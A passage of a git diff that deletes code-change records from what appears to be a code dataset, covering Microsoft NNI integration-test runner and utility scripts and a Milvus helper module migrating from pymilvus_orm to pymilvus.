print('kwargs:', kwargs) - experiment_id = get_experiment_id(EXPERIMENT_URL) - try: - validator(REST_ENDPOINT, get_experiment_dir(EXPERIMENT_URL), nni_source_dir, **kwargs) - except: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise - - -def get_max_values(config_file): - experiment_config = get_yml_content(config_file) - if experiment_config.get('maxExecDuration'): - return parse_max_duration_time(experiment_config['maxExecDuration']), experiment_config['maxTrialNum'] - else: - return parse_max_duration_time(experiment_config['maxExperimentDuration']), experiment_config['maxTrialNumber'] - - -def get_command(test_case_config, commandKey): - command = test_case_config.get(commandKey) - if commandKey == 'launchCommand': - assert command is not None - if command is None: - return None - - # replace variables - for k in it_variables: - command = command.replace(k, it_variables[k]) - - # hack for windows, not limited to local training service - if sys.platform == 'win32': - command = command.replace('python3', 'python') - - return command - - -def launch_test(config_file, training_service, test_case_config): - launch_command = get_command(test_case_config, 'launchCommand') - print('launch command: ', launch_command, flush=True) - - proc = subprocess.run(launch_command, shell=True) - - assert proc.returncode == 0, 'launch command failed with code %d' % proc.returncode - - # set experiment ID into variable - exp_var_name = test_case_config.get('setExperimentIdtoVar') - if exp_var_name is not None: - assert exp_var_name.startswith('$') - it_variables[exp_var_name] = get_experiment_id(EXPERIMENT_URL) - print('variables:', it_variables) - - max_duration, max_trial_num = get_max_values(config_file) - print('max_duration:', max_duration, ' max_trial_num:', max_trial_num) - - if not test_case_config.get('experimentStatusCheck'): - return - - bg_time = time.time() - print(str(datetime.datetime.now()), ' waiting ...', flush=True) - try: - # wait restful server to be ready - time.sleep(3) - experiment_id = get_experiment_id(EXPERIMENT_URL) - while True: - waited_time = time.time() - bg_time - if waited_time > max_duration + 10: - print('waited: {}, max_duration: {}'.format(waited_time, max_duration)) - break - status = get_experiment_status(STATUS_URL) - if status in ['DONE', 'ERROR']: - print('experiment status:', status) - break - num_failed = len(get_failed_trial_jobs(TRIAL_JOBS_URL)) - if num_failed > 0: - print('failed jobs: ', num_failed) - break - time.sleep(1) - except: - print_experiment_log(experiment_id=experiment_id) - raise - print(str(datetime.datetime.now()), ' waiting done', flush=True) - if get_experiment_status(STATUS_URL) == 'ERROR': - print_experiment_log(experiment_id=experiment_id) - - trial_stats = get_trial_stats(TRIAL_JOBS_URL) - print(json.dumps(trial_stats, indent=4), flush=True) - if status != 'DONE' or trial_stats['SUCCEEDED'] + trial_stats['EARLY_STOPPED'] < max_trial_num: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise AssertionError('Failed to finish in maxExecDuration') - - -def case_excluded(name, excludes): - if name is None: - return False - if excludes is not None: - excludes = excludes.split(',') - for e in excludes: - if name in e or e in name: - return True - return False - - -def case_included(name, cases): - assert cases is not None - for case in cases.split(','): - if case in name: - return True - return False - - -def match_platform(test_case_config): - return sys.platform in test_case_config['platform'].split(' ') - - -def match_training_service(test_case_config, cur_training_service): - case_ts = test_case_config['trainingService'] - assert case_ts is not None - if case_ts == 'all': - return True - if cur_training_service in case_ts.split(' '): - return True - return False - - -def run(args): - it_config = get_yml_content(args.config) - - for test_case_config in it_config['testCases']: - name = test_case_config['name'] - if case_excluded(name, args.exclude): - print('{} excluded'.format(name)) - continue - if args.cases and not case_included(name, args.cases): - continue - - # fill test case default config - for k in it_config['defaultTestCaseConfig']: - if k not in test_case_config: - test_case_config[k] = it_config['defaultTestCaseConfig'][k] - print(json.dumps(test_case_config, indent=4)) - - if not match_platform(test_case_config): - print('skipped {}, platform {} not match [{}]'.format(name, sys.platform, test_case_config['platform'])) - continue - - if not match_training_service(test_case_config, args.ts): - print('skipped {}, training service {} not match [{}]'.format( - name, args.ts, test_case_config['trainingService'])) - continue - # remote mode need more time to cleanup - if args.ts == 'remote' or args.ts == 'hybrid': - wait_for_port_available(8080, 240) - else: - wait_for_port_available(8080, 60) - - # adl mode need more time to cleanup PVC - if args.ts == 'adl' and name == 'nnictl-resume-2': - time.sleep(30) - print('## {}Testing: {}{} ##'.format(GREEN, name, CLEAR)) - begin_time = time.time() - - run_test_case(test_case_config, it_config, args) - print('{}Test {}: TEST PASS IN {} SECONDS{}'.format(GREEN, name, int(time.time()-begin_time), CLEAR), flush=True) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument("--config", type=str, required=True) - parser.add_argument("--nni_source_dir", type=str, default='../') - parser.add_argument("--cases", type=str, default=None) - parser.add_argument("--exclude", type=str, default=None) - parser.add_argument("--ts", type=str, choices=['local', 'remote', 'pai', - 'kubeflow', 'frameworkcontroller', 'adl', 'aml', 'hybrid'], default='local') - args = parser.parse_args() - - run(args) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py deleted file mode 100644 index f87416a..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py +++ /dev/null @@ -1,293 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import argparse -import datetime -import json -import os -import subprocess -import sys -import time - -import yaml - -import validators -from utils import (CLEAR, EXPERIMENT_URL, GREEN, RED, REST_ENDPOINT, - STATUS_URL, TRIAL_JOBS_URL, deep_update, dump_yml_content, - get_experiment_dir, get_experiment_id, - get_experiment_status, get_failed_trial_jobs, - get_trial_stats, get_yml_content, parse_max_duration_time, - print_experiment_log, print_trial_job_log, - wait_for_port_available) - -it_variables = {} - - -def update_training_service_config(config, training_service, config_file_path): - it_ts_config = get_yml_content(os.path.join('config', 'training_service.yml')) - - # hack for kubeflow trial config - if training_service == 'kubeflow': - it_ts_config[training_service]['trial']['worker']['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'frameworkcontroller': - it_ts_config[training_service]['trial']['taskRoles'][0]['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'adl': - # hack for adl trial config, codeDir in adl mode refers to path in container - containerCodeDir = config['trial']['codeDir'] - # replace metric test folders to container folder - if config['trial']['codeDir'] == '.': - containerCodeDir = '/' + config_file_path[:config_file_path.rfind('/')] - elif config['trial']['codeDir'] == '../naive_trial': - containerCodeDir = '/test/config/naive_trial' - elif '../../../' in config['trial']['codeDir']: - # replace example folders to container folder - containerCodeDir = config['trial']['codeDir'].replace('../../../', '/') - it_ts_config[training_service]['trial']['codeDir'] = containerCodeDir - it_ts_config[training_service]['trial']['command'] = 'cd {0} && {1}'.format(containerCodeDir, config['trial']['command']) - - if training_service == 'hybrid': - it_ts_config = get_yml_content(os.path.join('config', 'training_service_v2.yml')) - else: - deep_update(config, it_ts_config['all']) - deep_update(config, it_ts_config[training_service]) - - -def prepare_config_file(test_case_config, it_config, args): - config_path = args.nni_source_dir + test_case_config['configFile'] - test_yml_config = get_yml_content(config_path) - - # apply test case specific config - if test_case_config.get('config') is not None: - deep_update(test_yml_config, test_case_config['config']) - - # hack for windows - if sys.platform == 'win32' and args.ts == 'local': - test_yml_config['trial']['command'] = test_yml_config['trial']['command'].replace('python3', 'python') - - # apply training service config - # user's gpuNum, logCollection config is overwritten by the config in training_service.yml - # the hack for kubeflow should be applied at last step - update_training_service_config(test_yml_config, args.ts, test_case_config['configFile']) - - # generate temporary config yml file to launch experiment - new_config_file = config_path + '.tmp' - dump_yml_content(new_config_file, test_yml_config) - print(yaml.safe_dump(test_yml_config, default_flow_style=False), flush=True) - - return new_config_file - - -def run_test_case(test_case_config, it_config, args): - new_config_file = prepare_config_file(test_case_config, it_config, args) - # set configFile variable - it_variables['$configFile'] = new_config_file - - try: - launch_test(new_config_file, args.ts, test_case_config) - invoke_validator(test_case_config, args.nni_source_dir, args.ts) - finally: - stop_command = get_command(test_case_config, 'stopCommand') - print('Stop command:', stop_command, flush=True) - if stop_command: - subprocess.run(stop_command, shell=True) - exit_command = get_command(test_case_config, 'onExitCommand') - print('Exit command:', exit_command, flush=True) - if exit_command: - subprocess.run(exit_command, shell=True, check=True) - # remove tmp config file - if os.path.exists(new_config_file): - os.remove(new_config_file) - - -def invoke_validator(test_case_config, nni_source_dir, training_service): - validator_config = test_case_config.get('validator') - if validator_config is None or validator_config.get('class') is None: - return - - validator = validators.__dict__[validator_config.get('class')]() - kwargs = validator_config.get('kwargs', {}) - print('kwargs:', kwargs) - experiment_id = get_experiment_id(EXPERIMENT_URL) - try: - validator(REST_ENDPOINT, get_experiment_dir(EXPERIMENT_URL), nni_source_dir, **kwargs) - except: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise - - -def get_max_values(config_file): - experiment_config = get_yml_content(config_file) - if experiment_config.get('maxExecDuration'): - return parse_max_duration_time(experiment_config['maxExecDuration']), experiment_config['maxTrialNum'] - else: - return parse_max_duration_time(experiment_config['maxExperimentDuration']), experiment_config['maxTrialNumber'] - - -def get_command(test_case_config, commandKey): - command = test_case_config.get(commandKey) - if commandKey == 'launchCommand': - assert command is not None - if command is None: - return None - - # replace variables - for k in it_variables: - command = command.replace(k, it_variables[k]) - - # hack for windows, not limited to local training service - if sys.platform == 'win32': - command = command.replace('python3', 'python') - - return command - - -def launch_test(config_file, training_service, test_case_config): - launch_command = get_command(test_case_config, 'launchCommand') - print('launch command: ', launch_command, flush=True) - - proc = subprocess.run(launch_command, shell=True) - - assert proc.returncode == 0, 'launch command failed with code %d' % proc.returncode - - # set experiment ID into variable - exp_var_name = test_case_config.get('setExperimentIdtoVar') - if exp_var_name is not None: - assert exp_var_name.startswith('$') - it_variables[exp_var_name] = get_experiment_id(EXPERIMENT_URL) - print('variables:', it_variables) - - max_duration, max_trial_num = get_max_values(config_file) - print('max_duration:', max_duration, ' max_trial_num:', max_trial_num) - - if not test_case_config.get('experimentStatusCheck'): - return - - bg_time = time.time() - print(str(datetime.datetime.now()), ' waiting ...', flush=True) - try: - # wait restful server to be ready - time.sleep(3) - experiment_id = get_experiment_id(EXPERIMENT_URL) - while True: - waited_time = time.time() - bg_time - if waited_time > max_duration + 10: - print('waited: {}, max_duration: {}'.format(waited_time, max_duration)) - break - status = get_experiment_status(STATUS_URL) - if status in ['DONE', 'ERROR']: - print('experiment status:', status) - break - num_failed = len(get_failed_trial_jobs(TRIAL_JOBS_URL)) - if num_failed > 0: - print('failed jobs: ', num_failed) - break - time.sleep(1) - except: - print_experiment_log(experiment_id=experiment_id) - raise - print(str(datetime.datetime.now()), ' waiting done', flush=True) - if get_experiment_status(STATUS_URL) == 'ERROR': - print_experiment_log(experiment_id=experiment_id) - - trial_stats = get_trial_stats(TRIAL_JOBS_URL) - print(json.dumps(trial_stats, indent=4), flush=True) - if status != 'DONE' or trial_stats['SUCCEEDED'] + trial_stats['EARLY_STOPPED'] < max_trial_num: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise AssertionError('Failed to finish in maxExecDuration') - - -def case_excluded(name, excludes): - if name is None: - return False - if excludes is not None: - excludes = excludes.split(',') - for e in excludes: - if name in e or e in name: - return True - return False - - -def case_included(name, cases): - assert cases is not None - for case in cases.split(','): - if case in name: - return True - return False - - -def match_platform(test_case_config): - return sys.platform in test_case_config['platform'].split(' ') - - -def match_training_service(test_case_config, cur_training_service): - case_ts = test_case_config['trainingService'] - assert case_ts is not None - if case_ts == 'all': - return True - if cur_training_service in case_ts.split(' '): - return True - return False - - -def run(args): - it_config = get_yml_content(args.config) - - for test_case_config in it_config['testCases']: - name = test_case_config['name'] - if case_excluded(name, args.exclude): - print('{} excluded'.format(name)) - continue - if args.cases and not case_included(name, args.cases): - continue - - # fill test case default config - for k in it_config['defaultTestCaseConfig']: - if k not in test_case_config: - test_case_config[k] = it_config['defaultTestCaseConfig'][k] - print(json.dumps(test_case_config, indent=4)) - - if not match_platform(test_case_config): - print('skipped {}, platform {} not match [{}]'.format(name, sys.platform, test_case_config['platform'])) - continue - - if not match_training_service(test_case_config, args.ts): - print('skipped {}, training service {} not match [{}]'.format( - name, args.ts, test_case_config['trainingService'])) - continue - # remote mode need more time to cleanup - if args.ts == 'remote' or args.ts == 'hybrid': - wait_for_port_available(8080, 240) - else: - wait_for_port_available(8080, 60) - - # adl mode need more time to cleanup PVC - if args.ts == 'adl' and name == 'nnictl-resume-2': - time.sleep(30) - print('## {}Testing: {}{} ##'.format(GREEN, name, CLEAR)) - begin_time = time.time() - - run_test_case(test_case_config, it_config, args) - print('{}Test {}: TEST PASS IN {} SECONDS{}'.format(GREEN, name, int(time.time()-begin_time), CLEAR), flush=True) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument("--config", type=str, required=True) - parser.add_argument("--nni_source_dir", type=str, default='../') - parser.add_argument("--cases", type=str, default=None) - parser.add_argument("--exclude", type=str, default=None) - parser.add_argument("--ts", type=str, choices=['local', 'remote', 'pai', - 'kubeflow', 'frameworkcontroller', 'adl', 'aml', 'hybrid'], default='local') - args = parser.parse_args() - - run(args) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff deleted file mode 100644 index 1ae873b..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff +++ /dev/null @@ -1,28 +0,0 @@ -diff --git a/test/nni_test/nnitest/utils.py b/test/nni_test/nnitest/utils.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/test/nni_test/nnitest/utils.py - +++ b/test/nni_test/nnitest/utils.py -@@ -9,7 +9,7 @@ import sys - import subprocess - import requests - import time --import ruamel.yaml as yaml -+import yaml - import shlex - - EXPERIMENT_DONE_SIGNAL = 'Experiment done' -@@ -43,12 +43,12 @@ def remove_files(file_list): - def get_yml_content(file_path): - '''Load yaml file content''' - with open(file_path, 'r') as file: -- return yaml.load(file, Loader=yaml.Loader) -+ return yaml.safe_load(file) - - def dump_yml_content(file_path, content): - '''Dump yaml file content''' - with open(file_path, 'w') as file: -- file.write(yaml.dump(content, default_flow_style=False)) -+ file.write(yaml.safe_dump(content, default_flow_style=False)) - - def setup_experiment(installed=True): - '''setup the experiment if nni is not installed''' diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py deleted file mode 100644 index 566cb8e..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py +++ /dev/null @@ -1,181 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import contextlib -import collections -import os -import socket -import sys -import subprocess -import requests -import time -import ruamel.yaml as yaml -import shlex - -EXPERIMENT_DONE_SIGNAL = 'Experiment done' - -GREEN = '\33[32m' -RED = '\33[31m' -CLEAR = '\33[0m' - -REST_ENDPOINT = 'http://localhost:8080' -API_ROOT_URL = REST_ENDPOINT + '/api/v1/nni' -EXPERIMENT_URL = API_ROOT_URL + '/experiment' -STATUS_URL = API_ROOT_URL + '/check-status' -TRIAL_JOBS_URL = API_ROOT_URL + '/trial-jobs' -METRICS_URL = API_ROOT_URL + '/metric-data' -GET_IMPORTED_DATA_URL = API_ROOT_URL + '/experiment/imported-data' - -def read_last_line(file_name): - '''read last line of a file and return None if file not found''' - try: - *_, last_line = open(file_name) - return last_line.strip() - except (FileNotFoundError, ValueError): - return None - -def remove_files(file_list): - '''remove a list of files''' - for file_path in file_list: - with contextlib.suppress(FileNotFoundError): - os.remove(file_path) - -def get_yml_content(file_path): - '''Load yaml file content''' - with open(file_path, 'r') as file: - return yaml.load(file, Loader=yaml.Loader) - -def dump_yml_content(file_path, content): - '''Dump yaml file content''' - with open(file_path, 'w') as file: - file.write(yaml.dump(content, default_flow_style=False)) - -def setup_experiment(installed=True): - '''setup the experiment if nni is not installed''' - if not installed: - os.environ['PATH'] = os.environ['PATH'] + ':' + os.getcwd() - sdk_path = os.path.abspath('../src/sdk/pynni') - cmd_path = os.path.abspath('../tools') - pypath = os.environ.get('PYTHONPATH') - if pypath: - pypath = ':'.join([pypath, sdk_path, cmd_path]) - else: - pypath = ':'.join([sdk_path, cmd_path]) - os.environ['PYTHONPATH'] = pypath - -def get_experiment_id(experiment_url): - experiment_id = requests.get(experiment_url).json()['id'] - return experiment_id - -def get_experiment_dir(experiment_url=None, experiment_id=None): - '''get experiment root directory''' - assert any([experiment_url, experiment_id]) - if experiment_id is None: - experiment_id = get_experiment_id(experiment_url) - return os.path.join(os.path.expanduser('~'), 'nni-experiments', experiment_id) - -def get_nni_log_dir(experiment_url=None, experiment_id=None): - '''get nni's log directory from nni's experiment url''' - return os.path.join(get_experiment_dir(experiment_url, experiment_id), 'log') - -def get_nni_log_path(experiment_url): - '''get nni's log path from nni's experiment url''' - return os.path.join(get_nni_log_dir(experiment_url), 'nnimanager.log') - -def is_experiment_done(nnimanager_log_path): - '''check if the experiment is done successfully''' - assert os.path.exists(nnimanager_log_path), 'Experiment starts failed' - - with open(nnimanager_log_path, 'r') as f: - log_content = f.read() - - return EXPERIMENT_DONE_SIGNAL in log_content - -def get_experiment_status(status_url): - nni_status = requests.get(status_url).json() - return nni_status['status'] - -def get_trial_stats(trial_jobs_url): - trial_jobs = requests.get(trial_jobs_url).json() - trial_stats = collections.defaultdict(int) - for trial_job in trial_jobs: - trial_stats[trial_job['status']] += 1 - return trial_stats - -def get_trial_jobs(trial_jobs_url, status=None): - '''Return failed trial jobs''' - trial_jobs = requests.get(trial_jobs_url).json() - res = [] - for trial_job in trial_jobs: - if status is None or trial_job['status'] == status: - res.append(trial_job) - return res - -def get_failed_trial_jobs(trial_jobs_url): - '''Return failed trial jobs''' - return get_trial_jobs(trial_jobs_url, 'FAILED') - -def print_file_content(filepath): - with open(filepath, 'r') as f: - content = f.read() - print(filepath, flush=True) - print(content, flush=True) - -def print_trial_job_log(training_service, trial_jobs_url): - trial_jobs = get_trial_jobs(trial_jobs_url) - for trial_job in trial_jobs: - trial_log_dir = os.path.join(get_experiment_dir(EXPERIMENT_URL), 'trials', trial_job['trialJobId']) - log_files = ['stderr', 'trial.log'] if training_service == 'local' else ['stdout_log_collection.log'] - for log_file in log_files: - print_file_content(os.path.join(trial_log_dir, log_file)) - -def print_experiment_log(experiment_id): - log_dir = get_nni_log_dir(experiment_id=experiment_id) - for log_file in ['dispatcher.log', 'nnimanager.log']: - filepath = os.path.join(log_dir, log_file) - print_file_content(filepath) - - print('nnictl log stderr:') - subprocess.run(shlex.split('nnictl log stderr {}'.format(experiment_id))) - print('nnictl log stdout:') - subprocess.run(shlex.split('nnictl log stdout {}'.format(experiment_id))) - -def parse_max_duration_time(max_exec_duration): - unit = max_exec_duration[-1] - time = max_exec_duration[:-1] - units_dict = {'s':1, 'm':60, 'h':3600, 'd':86400} - return int(time) * units_dict[unit] - -def deep_update(source, overrides): - """Update a nested dictionary or similar mapping. - - Modify ``source`` in place. - """ - for key, value in overrides.items(): - if isinstance(value, collections.Mapping) and value: - returned = deep_update(source.get(key, {}), value) - source[key] = returned - else: - source[key] = overrides[key] - return source - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET,socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - - -def wait_for_port_available(port, timeout): - begin_time = time.time() - while True: - if not detect_port(port): - return - if time.time() - begin_time > timeout: - msg = 'port {} is not available in {} seconds.'.format(port, timeout) - raise RuntimeError(msg) - time.sleep(1) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py deleted file mode 100644 index 3007990..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py +++ /dev/null @@ -1,181 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import contextlib -import collections -import os -import socket -import sys -import subprocess -import requests -import time -import yaml -import shlex - -EXPERIMENT_DONE_SIGNAL = 'Experiment done' - -GREEN = '\33[32m' -RED = '\33[31m' -CLEAR = '\33[0m' - -REST_ENDPOINT = 'http://localhost:8080' -API_ROOT_URL = REST_ENDPOINT + '/api/v1/nni' -EXPERIMENT_URL = API_ROOT_URL + '/experiment' -STATUS_URL = API_ROOT_URL + '/check-status' -TRIAL_JOBS_URL = API_ROOT_URL + '/trial-jobs' -METRICS_URL = API_ROOT_URL + '/metric-data' -GET_IMPORTED_DATA_URL = API_ROOT_URL + '/experiment/imported-data' - -def read_last_line(file_name): - '''read last line of a file and return None if file not found''' - try: - *_, last_line = open(file_name) - return last_line.strip() - except (FileNotFoundError, ValueError): - return None - -def remove_files(file_list): - '''remove a list of files''' - for file_path in file_list: - with contextlib.suppress(FileNotFoundError): - os.remove(file_path) - -def get_yml_content(file_path): - '''Load yaml file content''' - with open(file_path, 'r') as file: - return yaml.safe_load(file) - -def dump_yml_content(file_path, content): - '''Dump yaml file content''' - with open(file_path, 'w') as file: - file.write(yaml.safe_dump(content, default_flow_style=False)) - -def setup_experiment(installed=True): - '''setup the experiment if nni is not installed''' - if not installed: - os.environ['PATH'] = os.environ['PATH'] + ':' + os.getcwd() - sdk_path = os.path.abspath('../src/sdk/pynni') - cmd_path = os.path.abspath('../tools') - pypath = os.environ.get('PYTHONPATH') - if pypath: - pypath = ':'.join([pypath, sdk_path, cmd_path]) - else: - pypath = ':'.join([sdk_path, cmd_path]) - os.environ['PYTHONPATH'] = pypath - -def get_experiment_id(experiment_url): - experiment_id = requests.get(experiment_url).json()['id'] - return experiment_id - -def get_experiment_dir(experiment_url=None, experiment_id=None): - '''get experiment root directory''' - assert any([experiment_url, experiment_id]) - if experiment_id is None: - experiment_id = get_experiment_id(experiment_url) - return os.path.join(os.path.expanduser('~'), 'nni-experiments', experiment_id) - -def get_nni_log_dir(experiment_url=None, experiment_id=None): - '''get nni's log directory from nni's experiment url''' - return os.path.join(get_experiment_dir(experiment_url, experiment_id), 'log') - -def get_nni_log_path(experiment_url): - '''get nni's log path from nni's experiment url''' - return os.path.join(get_nni_log_dir(experiment_url), 'nnimanager.log') - -def is_experiment_done(nnimanager_log_path): - '''check if the experiment is done successfully''' - assert os.path.exists(nnimanager_log_path), 'Experiment starts failed' - - with open(nnimanager_log_path, 'r') as f: - log_content = f.read() - - return EXPERIMENT_DONE_SIGNAL in log_content - -def get_experiment_status(status_url): - nni_status = requests.get(status_url).json() - return nni_status['status'] - -def get_trial_stats(trial_jobs_url): - trial_jobs = requests.get(trial_jobs_url).json() - trial_stats = collections.defaultdict(int) - for trial_job in trial_jobs: - trial_stats[trial_job['status']] += 1 - return trial_stats - -def get_trial_jobs(trial_jobs_url, status=None): - '''Return failed trial jobs''' - trial_jobs = requests.get(trial_jobs_url).json() - res = [] - for trial_job in trial_jobs: - if status is None or trial_job['status'] == status: - res.append(trial_job) - return res - -def get_failed_trial_jobs(trial_jobs_url): - '''Return failed trial jobs''' - return get_trial_jobs(trial_jobs_url, 'FAILED') - -def print_file_content(filepath): - with open(filepath, 'r') as f: - content = f.read() - print(filepath, flush=True) - print(content, flush=True) - -def print_trial_job_log(training_service, trial_jobs_url): - trial_jobs = get_trial_jobs(trial_jobs_url) - for trial_job in trial_jobs: - trial_log_dir = os.path.join(get_experiment_dir(EXPERIMENT_URL), 'trials', trial_job['trialJobId']) - log_files = ['stderr', 'trial.log'] if training_service == 'local' else ['stdout_log_collection.log'] - for log_file in log_files: - print_file_content(os.path.join(trial_log_dir, log_file)) - -def print_experiment_log(experiment_id): - log_dir = get_nni_log_dir(experiment_id=experiment_id) - for log_file in ['dispatcher.log', 'nnimanager.log']: - filepath = os.path.join(log_dir, log_file) - print_file_content(filepath) - - print('nnictl log stderr:') - subprocess.run(shlex.split('nnictl log stderr {}'.format(experiment_id))) - print('nnictl log stdout:') - subprocess.run(shlex.split('nnictl log stdout {}'.format(experiment_id))) - -def parse_max_duration_time(max_exec_duration): - unit = max_exec_duration[-1] - time = max_exec_duration[:-1] - units_dict = {'s':1, 'm':60, 'h':3600, 'd':86400} - return int(time) * units_dict[unit] - -def deep_update(source, overrides): - """Update a nested dictionary or similar mapping. - - Modify ``source`` in place. - """ - for key, value in overrides.items(): - if isinstance(value, collections.Mapping) and value: - returned = deep_update(source.get(key, {}), value) - source[key] = returned - else: - source[key] = overrides[key] - return source - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET,socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - - -def wait_for_port_available(port, timeout): - begin_time = time.time() - while True: - if not detect_port(port): - return - if time.time() - begin_time > timeout: - msg = 'port {} is not available in {} seconds.'.format(port, timeout) - raise RuntimeError(msg) - time.sleep(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff deleted file mode 100644 index b51a84a..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff +++ /dev/null @@ -1,87 +0,0 @@ -diff --git a/benchmark_test/scripts/milvus_helpers.py b/benchmark_test/scripts/milvus_helpers.py - index 686eb089177760540e463c6829ccc0fec25e8469..89c7afc6548362e9bbf1dbf6142aabb02bc3bb93 100644 - --- a/benchmark_test/scripts/milvus_helpers.py - +++ b/benchmark_test/scripts/milvus_helpers.py -@@ -1,10 +1,7 @@ - import sys --from pymilvus_orm import connections, Index --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -+ - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, NLIST --from pymilvus_orm import utility - from logs import LOGGER - - -@@ -25,7 +22,7 @@ def set_collection(self, collection_name): - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: -- LOGGER.error("Failed to set collection: {}".format(e)) -+ LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection -@@ -94,8 +91,9 @@ def get_index_params(self, collection_name): - # Delete Milvus collection - def delete_collection(self, collection_name): - try: -- self.set_collection(collection_name) -- self.collection.drop() -+ # self.set_collection(collection_name) -+ # self.collection.drop() -+ utility.drop_collection(collection_name) - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: -@@ -126,6 +124,7 @@ def count(self, collection_name): - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) - -+ # create a partition for Milvus - def create_partition(self, collection_name, partition_name): - self.set_collection(collection_name) - if self.collection.has_partition(partition_name): -@@ -134,23 +133,33 @@ def create_partition(self, collection_name, partition_name): - partition = self.collection.create_partition(partition_name) - return partition - -+ # drop index - def delete_index(self, collection_name): - self.set_collection(collection_name) - self.collection.drop_index() -- -+ -+ # load data from disk to memory - def load_data(self, collection_name): - self.set_collection(collection_name) - self.collection.load() -- -- def show_collection(self): -+ -+ # List all collections. -+ def list_collection(self): - return utility.list_collections() -- -+ -+ # Query the progress of loading. - def get_loading_progress(self, collection_name): - return utility.loading_progress(collection_name) -- -+ -+ # Query the progress of index building. - def get_index_progress(self, collection_name): - return utility.index_building_progress(collection_name) -- -- def release_mem(self, collection_name): -+ -+ # release collection data from memory -+ def release_data(self, collection_name): - self.set_collection(collection_name) - return self.collection.release() -+ -+ # Calculate distance between two vector arrays. -+ def calculate_distance(self, vectors_left, vectors_right): -+ return utility.calc_distance(vectors_left, vectors_right) diff --git a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py deleted file mode 100644 index b5f437e..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py +++ /dev/null @@ -1,156 +0,0 @@ -import sys -from pymilvus_orm import connections, Index -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, NLIST -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to set collection: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, - auto_id=False) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", 